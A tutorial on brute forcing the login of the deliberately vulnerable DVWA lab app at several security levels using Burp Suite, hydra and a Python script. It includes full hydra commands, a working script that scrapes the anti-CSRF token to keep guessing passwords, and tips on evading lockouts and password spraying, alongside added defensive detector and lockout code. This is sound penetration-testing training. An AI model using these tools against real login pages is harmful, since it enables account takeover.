DVWA Brute Force Logo

Brute Forcing Web Logins with DVWA

In this tutorial, I will show you how to beat the Low, Medium and High levels of the brute force challenge within DVWA (Damn Vulnerable Web App).

If you want to follow along and have not yet got DVWA set up, take a look at this tutorial on Setting up a Vulnerable LAMP Server. It will run you through setting up a vulnerable virtual machine and installing DVWA, which I have used as the basis for all my web hacking tutorials on Hemps Tutorials.

I have been meaning to write this tutorial for a while, after the popularity of a previous tutorial, Brute Forcing Passwords with THC-Hydra. In that tutorial I cover using hydra to brute force a whole bunch of services exposed to the internet, but in the Brute Forcing Webpage Login section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.

The problem is that Tamper Data no longer works in Firefox, since Firefox transitioned to a new framework for developing extensions. This means we are going to have to use something else as a proxy to intercept our web requests.

The best replacement for Tamper Data is Burp Suite, which we will use as our proxy to capture the web requests we need to construct our hydra command.

Burp Suite

Burp Suite is a graphical tool for testing web application security. Written in Java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application through to finding and exploiting security vulnerabilities.

There are three different versions of Burp Suite: Enterprise, Professional and the free Community edition. As we are only going to need a fraction of Burp's potential in this tutorial, the free Community edition should be just fine.

You can download Burp Suite for Linux, Mac or Windows, or as a Java JAR file (which will basically run on anything that runs Java), over at the PortSwigger site.

If you want more information about Burp Suite, check out the talk below, “Web App Pen Testing with Burp Suite” by Jason Nikola, from the recent SANS KringleCon.

Low Security

In the Low security setting the DVWA Brute Force login prompt is just a straightforward HTTP GET request, with no protection in place to block or stop you from hammering it with hydra.

This will be exactly the same process I covered in Brute Forcing Passwords with THC-Hydra, but this time I will be using Burp Suite instead of Tamper Data to capture our requests.

Let's get logged into DVWA, which unless it has been changed should be the standard username and password of admin/password, and let's make a start.

Step By Step Brute Force DVWA (Low Security)

  1. Set DVWA Security to Low

    Start by making sure DVWA's security is set to Low. Do this by clicking the DVWA Security button on the left menu, selecting Low in the security level drop-down and clicking Submit.



  2. Click The Brute Force button

    Click the Brute Force button on the menu on the left to enter the Brute Force Section of DVWA.

    DVWA Brute force

  3. Open Burp Suite and set up the web proxy.

    Open up Burp Suite. Once Burp is loaded, click the Proxy tab, then Options, and make sure you have a Proxy Listener set up.


    This should be set to your localhost, 127.0.0.1:8080. You can adjust this as you need, but if you are using Burp with your local web browser just leave the defaults.

  4. Turn Intercept On

    Within Burp Suite move across to the Intercept tab and make sure the Intercept button is on.



    Burp is now ready to start receiving requests, and all we have left to do is set up Firefox to send its requests to the web server via Burp.

  5. Network Settings in Firefox

    Within Firefox type about:preferences in the address bar; this should take you directly to the Preferences tab.


    Scroll right down to the bottom of the page until you see Network Settings, then click Settings.

  6. Set Proxy

    You should now be in the Connection Settings within Firefox. Set the radio button to Manual proxy configuration. This needs to be set to your localhost on 127.0.0.1 and the port to 8080, unless you changed the port to something other than the default in step 3.

  7. Make a request.

    Now the proxy is all configured, we need to make a request to the DVWA Brute Force page.

    In my example I used the username UsEr and the password PaSs, then clicked the Login button.

    Brute force login DVWA

  8. Request Received by burp.

    The request should be received by Burp's Proxy.


    DVWA Burp Intercept
    Make a note of this request, as we will need information from it to construct our hydra command later.

  9. Failed Login Message

    In Burp Suite, click the Forward button to forward our intercepted request on to the web server.

    Failed Login Message

    Because we have not entered the correct username and password, we are presented with an error message that states “Username and/or password incorrect.”

    Add this to the notes you took of the request in step 8; it allows us to tell hydra that anything other than this error message must be a valid login.

  10. Construct your hydra command

    Use the data intercepted by Burp to construct your hydra command, as I have done below.

    hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low"

    I will break this hydra command down for you:

    -V  Verbose output, showing the login + pass for each attempt in the terminal.
    -l admin  Login using the login name provided. This could be a capital -L to try a list of usernames instead.
    -P  Load passwords from a file; in my case this file is called QuickPasswords.txt.
    http-get-form  Tells hydra we want to use a GET request, followed by the location of the form we want to brute force. This information was gathered from the details intercepted in step 8.
    username=^USER^&password=^PASS^  Adds place markers in our command where we want hydra to substitute its guesses (just replace the actual username and password you used when logging in).
    :F=Username and/or password incorrect.  This is the failure message noted in step 9; it tells hydra that anything other than this message must be a valid login.
    H=Cookie:  This is the cookie information generated when you log in to DVWA. It is only needed because of DVWA's own login page; in the real world you won't normally be logged in before reaching a login page.

  11. Run Hydra Command

    Run your hydra command. Depending on the size of the password list used, this should only take a few minutes or so before it finds the correct password.

    Hydra DVWA Low

If you have issues with any of the steps above, please leave me a comment at the bottom of this tutorial and I will give you any help you need to get up and running.
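From the defender's side of the same run, here is an added example (written for this page, not code from the original tutorial): a small detector that reads Apache-style access log lines for the DVWA login form used above and flags any source IP that makes five or more login attempts inside a minute. The log lines are constructed, with invented IPs and timestamps, to look like the GETs the hydra command produces.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

LOGIN_PATH = "/dvwa/vulnerabilities/brute/"     # the form the hydra command targets
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed access-log lines (IPs and times invented) modelling a hydra
# http-get-form run: one GET per guess, and every failure is still answered 200,
# so the status code alone cannot tell a guess from a normal visit.
SAMPLE_LOG = "\n".join(
    f'192.168.0.50 - - [10/Mar/2019:14:02:{i:02d} +0000] "GET {LOGIN_PATH}'
    f'?username=admin&password=guess{i}&Login=Login HTTP/1.1" 200 1620'
    for i in range(8)
) + ('\n192.168.0.77 - - [10/Mar/2019:14:02:30 +0000] "GET ' + LOGIN_PATH +
     '?username=gordonb&password=abc123&Login=Login HTTP/1.1" 200 1620\n')


def parse_attempt(line):
    """Return (ip, timestamp, username) for a GET of the login form, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, _status = m.groups()
    url = urlparse(target)
    if method != "GET" or url.path != LOGIN_PATH or "username" not in url.query:
        return None
    user = parse_qs(url.query).get("username", [""])[0]
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), user


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag each source IP the first time it reaches `threshold` login attempts
    within `window`; sliding window per IP, so a slow trickle is not flagged."""
    recent = defaultdict(deque)        # ip -> timestamps still inside the window
    users = defaultdict(set)           # ip -> usernames it has tried
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_attempt(line)
        if parsed is None:
            continue
        ip, ts, user = parsed
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while ts - q[0] > window:      # expire attempts older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"attempts": len(q), "users": sorted(users[ip])}
    return alerts
```

Because this form submits credentials in a GET query string, every guessed password also lands in clear text in the web server's access log, so those logs need to be treated as sensitive.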

Medium Security

The Medium security setting extends the Low level by adding a time delay of two seconds on failed logins.

Re-run the hydra command you used for Low security, changing the security setting at the end of the command to medium.

hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"

The hydra command still works; it just takes a little longer to run. This is because the PHP has been adjusted to add the two-second delay on every failed login.

Luckily DVWA lets us easily check the PHP source code for every security level: just click the View Source button at the bottom of the DVWA window. This displays the PHP source, which shows the sleep( 2 ) call in the failed-login branch, as pictured below.

PHP source code sleep function added

This shows that adding a time delay on failed logins is not a deterrent or adequate protection against a brute force attack. The delay only increases the time needed to perform the attack by slowing the rate of attempts.

High Security

Switching to the High security level in DVWA extends the Medium level by making the time delay after a failed login a random number between 0 and 4 seconds. The developer has also introduced an anti Cross-Site Request Forgery (CSRF) token.

If you just re-run the hydra command as we did with Medium security, changing the security= at the end of the command to high as below...

hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt'  http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"

Hydra's output will be wrong, claiming it has found 16 valid passwords: the CSRF error page does not contain the failure string we told hydra to look for, so every attempt looks like a success.

DVWA on high does not work with Hydra

Before going any further, let us use Firefox's Inspector by right-clicking the web page within Firefox, choosing Inspect Element, and taking a look at the HTML.

Drill down in Inspect Element until you find the HTML for the login form. Notice there is now a hidden field with the name user_token being submitted with our GET request.

HTML for DVWA Brute Force Login on High

If you change type="hidden" to type="text" you should see the hidden box render in your web browser.

Unhidden user token

If you remove all the characters from this un-hidden box and try to log in, we get a new error message that states “CSRF token is incorrect”.

CSRF token is invalid

Making Burp intercept a login attempt shows the user_token, with a string of alphanumeric characters, added to the end of the GET request.

Forward the intercepted request on and have another go at logging in; notice that user_token= has changed to another random alphanumeric string.

This is the CSRF token. It is used to vouch for the origin of the request received by the server: an unguessable random value generated by the server, which is sent along with our GET request.

On the brute forcing page we are currently looking at, if the CSRF token does not match, our request errors with the message “CSRF token is incorrect”, which we saw previously when we sent a request with all the characters removed from the hidden user_token= field.

CSRF Token Is incorrect.
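To make the behaviour just described concrete, here is an added example (written for this page; hypothetical code, not DVWA's own PHP) modelling the server side of the High level: each rendering of the form mints a fresh token, the login is only checked when the submitted user_token matches, and the token rotates on every response, so a replayed or blank token gets the CSRF error.

```python
import hmac
import re
import secrets

FAIL_MSG = "Username and/or password incorrect."
CSRF_MSG = "CSRF token is incorrect"


class BruteForcePage:
    """Hypothetical stand-in for the High level's server side. The token lives
    in the session and is echoed in the hidden user_token field."""

    def __init__(self, users):
        self.users = users            # username -> password (lab data only)
        self.session_token = None

    def render_form(self):
        """Mint a new token and return the hidden input as the browser sees it."""
        self.session_token = secrets.token_hex(16)
        return f'<input type="hidden" name="user_token" value="{self.session_token}">'

    def login(self, username, password, user_token):
        """Handle one GET carrying username, password and user_token."""
        # constant-time comparison; a blank, stale or guessed token fails here
        if self.session_token is not None and hmac.compare_digest(
                user_token.encode(), self.session_token.encode()):
            ok = self.users.get(username) == password
            result = f"Welcome to the password protected area {username}" if ok else FAIL_MSG
        else:
            result = CSRF_MSG
        self.render_form()            # every reply carries a fresh token
        return result


def extract_token(html):
    """Client side: pull user_token out of the page, as the Python script below does."""
    m = re.search(r'name="user_token" value="([0-9a-f]+)"', html)
    return m.group(1) if m else ""


def replay_demo():
    """Show why a fixed, hydra-style request fails: the token is single-use."""
    page = BruteForcePage({"admin": "password"})
    token = extract_token(page.render_form())
    first = page.login("admin", "wrong", token)         # wrong password, valid token
    replay = page.login("admin", "password", token)     # right password, stale token
    fresh = page.login("admin", "password", extract_token(page.render_form()))
    return first, replay, fresh
```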

We can no longer use hydra alone to brute force DVWA on the High security level, as hydra does not have the ability to collect the CSRF token while making the request, so we have to get a little more creative to make this brute force work.

There are a few different options to get around this. Firstly we could use Burp: it can capture the CSRF token and run the brute force against the page using the Intruder tab in Burp's menus, but in the Community edition this feature only allows a single thread to run at a time, greatly reducing Burp's attack speed.

You can also combine Burp with hydra by putting hydra's traffic through Burp as a proxy. This lets Burp handle the requests and capture the CSRF token, altering hydra's initial request so that hydra does not need to be aware of the CSRF token; it also bypasses the Intruder limitations of the Community edition.

Lastly, we can have a go at creating our own brute forcing tool, which is the option I thought was most interesting and which I will cover below using Python.

If you would like to see a tutorial on using Burp, or Burp and hydra together, to brute force DVWA on High security, please let me know in the comments below and I will make a separate tutorial for them.

Using Python to Brute Force DVWA (High Security)

While researching for this tutorial I came across a post on Medium by Danny Beton, https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39, where he covers step by step creating the Python script that allows you to capture the CSRF token and brute force the login to DVWA on High security.

I did have to make a few changes to the original script from Danny's page to get it working, but only because I was having issues with the password file adding 0x0n to the end of each brute force password attempt; I also wanted to see each password tried output to the screen as the script runs.

My edit to Danny's brute force Python script.

Below is my edited version of Danny's Python script, which I saved as DVWA-BruteForce.py.

from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv

# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID': 'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)


def checkSuccess(html):
    """Search the response HTML for our specified success message."""
    # get our soup ready for searching
    soup = Soup(html, 'html.parser')
    # check for our success message in the soup
    search = soup.find_all(string=success_message)
    # return the brute force result
    return bool(search)


def getToken(html):
    """Pull the current anti-CSRF token out of the hidden user_token field."""
    soup = Soup(html, 'html.parser')
    return soup.find('input', attrs={'name': 'user_token'})['value']


# Get the initial CSRF token from the target site
csrf_token = getToken(target_page.text)

# Display before attack
print('DVWA URL: ' + url)
print('CSRF Token=' + csrf_token)

# Loop through our provided password file
success = False
with open(filename) as f:
    print('Running brute force attack...')
    for password in f:
        # strip the trailing newline from the password list before using it
        password = password.strip()
        print('password tried: ' + password)

        # setup the payload
        payload = {'username': 'admin', 'password': password,
                   'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)

        if not success:
            # if it failed the CSRF token will have changed. Get the new one
            csrf_token = getToken(r.text)
        else:
            # Success! Show the result
            print('Password is: ' + password)
            break

# We failed, bummer.
if not success:
    print('Brute force failed. No matches found.')


You will need to install the Python modules BeautifulSoup and requests for the script above to work, as these are not part of the modules pre-installed with Python.

BeautifulSoup is a web scraping library, used here to capture the CSRF token. Requests is what he used to make the requests to the web server. He also used argv to supply arguments to the script from the command line, but this module already comes with Python.

These modules can be installed using pip with the commands below.

sudo pip3 install requests
sudo pip3 install beautifulsoup4

Also, to get this to work you need to edit the url = line in the script to the IP address of your DVWA web server, and capture a PHPSESSID using Burp as we did previously in step 8 of the Low security section, then add your PHPSESSID to the cookie in the script.

Run the Python script with the command below, adding the password list and the message received on a successful login.

python3 DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"

If the script works you should see output like this...

DVWA High Security Brute Force Script Output.

Impossible Security

Brute force and user enumeration should not be possible at the Impossible security level in DVWA. There is now a lockout feature: if there are five bad logins within 15 minutes, the user account gets locked out.

If the locked-out user tries to log in, even with a valid password, it will say their username or password is incorrect. This should make it impossible to tell that there is a valid account on the system.

error message from failed login on impossible DVWA Brute Force
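As an added example (written for this page, not DVWA's own PHP), here is a model of the lockout rule just described, using the page's numbers: five bad logins inside 15 minutes lock the account, and the reply is the same generic message whether the user is unknown, the password is wrong, or the account is locked. One assumption of the model is that attempts made during the lockout are counted too, so hammering a locked account keeps it locked.

```python
from collections import deque
from datetime import datetime, timedelta

GENERIC_FAIL = "Username and/or password incorrect."
MAX_FAILURES = 5                    # bad logins that trigger the lockout
LOCKOUT = timedelta(minutes=15)     # counting window, and therefore lockout length


class AccountGuard:
    """Hypothetical model of the Impossible level's lockout. Failures are kept
    per username in a sliding 15-minute window; while five or more sit in the
    window the account is locked. The caller passes `now` so the behaviour can
    be exercised without waiting (a real server would use the clock)."""

    def __init__(self, users):
        self.users = users              # username -> password (lab data only)
        self.failures = {}              # username -> deque of failure times

    def _recent_failures(self, username, now):
        q = self.failures.setdefault(username, deque())
        while q and now - q[0] >= LOCKOUT:
            q.popleft()                 # failures older than the window age out
        return q

    def is_locked(self, username, now):
        return len(self._recent_failures(username, now)) >= MAX_FAILURES

    def login(self, username, password, now):
        """One login attempt at time `now`; returns the message the user sees."""
        if (username in self.users and not self.is_locked(username, now)
                and self.users[username] == password):
            self.failures.pop(username, None)   # clean slate after a real login
            return f"Welcome to the password protected area {username}"
        # unknown user, wrong password and locked account all end up here, and
        # all get the identical message (the locked attempt is counted as well)
        self._recent_failures(username, now).append(now)
        return GENERIC_FAIL
```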

If time is not an issue we do have a couple of options here that would eventually brute force the login. We could edit the Python script we used on High security and add a 15-minute wait after every four password tries. This would mean you only try 16 different passwords an hour, and with a huge wordlist it could take months or even years to complete.

The other option would be password spraying, where you use one password against multiple users; because you are not hammering a single user, you end up not hitting the lockout threshold.

If you would like to see some more information about password spraying, leave me a comment below and I will make sure I add it to the list of future posts.

HomeWork

Using everything you have just learnt from this tutorial and the Brute Forcing Passwords with THC-Hydra tutorial, set the DVWA security to Low and use hydra to try to enumerate/brute force the other four user logins, and post your findings in the comments section below.
